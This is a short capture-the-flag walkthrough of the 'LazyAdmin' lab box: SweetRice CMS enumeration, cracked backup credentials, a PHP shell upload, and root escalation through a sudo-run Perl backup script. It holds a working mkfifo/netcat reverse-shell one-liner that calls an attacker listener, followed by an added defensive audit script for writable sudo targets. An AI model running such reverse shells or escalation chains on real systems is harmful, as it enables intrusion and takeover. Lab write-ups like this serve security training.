LazyAdmin

Discovered SweetRice CMS and the inc directory.

Discovered a CMS backup and found a username and password in it. Used CrackStation to get the cleartext password.

Log in to the CMS.

Exploit by uploading a shell (PHP reverse shell or cmd shell).

Run sudo -l to see what the current user can run with sudo.

```
echo "rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|/bin/sh -i 2>&1|nc 10.9.47.64 5555 >/tmp/g" >>copy.sh
attack# nc -lnvp 5555
box# sudo /usr/bin/perl /home/itguy/backup.pl
cat /root/flag.txt
```
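
A defender-side check for the misconfiguration the last step relies on, as an added example that is not part of the original notes: it flags any file run through a sudo rule, or its parent directory, that someone other than root can modify. It assumes backup.pl executes copy.sh (the notes imply this but do not show it) and GNU or BusyBox stat; the function names and TRUSTED_UID are made up for this example.

```shell
#!/bin/sh
# Added example: audit files that a sudo rule causes root to execute.
# Assumption: stat supports -c (GNU coreutils or BusyBox).
# TRUSTED_UID is a hypothetical knob; it defaults to root (uid 0).
TRUSTED_UID="${TRUSTED_UID:-0}"

# Return 0 if the path can be modified by anyone other than TRUSTED_UID.
untrusted_can_write() {
    owner=$(stat -c '%u' "$1") || return 0   # unreadable or missing: treat as unsafe
    mode=$(stat -c '%a' "$1") || return 0
    # Owned by someone else: that owner can rewrite it.
    [ "$owner" != "$TRUSTED_UID" ] && return 0
    # 022 = group-write | other-write permission bits.
    [ $(( 0$mode & 022 )) -ne 0 ] && return 0
    return 1
}

# Check each file and its parent directory (a writable directory lets the
# file be replaced even when the file itself is locked down).
# Exit status: 0 = clean, 1 = at least one finding printed.
audit_sudo_target() {
    findings=0
    for f in "$@"; do
        for p in "$f" "$(dirname "$f")"; do
            if untrusted_can_write "$p"; then
                echo "UNSAFE: $p mode=$(stat -c '%a' "$p" 2>/dev/null) owner=$(stat -c '%U' "$p" 2>/dev/null)"
                findings=1
            fi
        done
    done
    return "$findings"
}
```

Run it as root against every script named in a sudoers rule and every file those scripts execute in turn.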
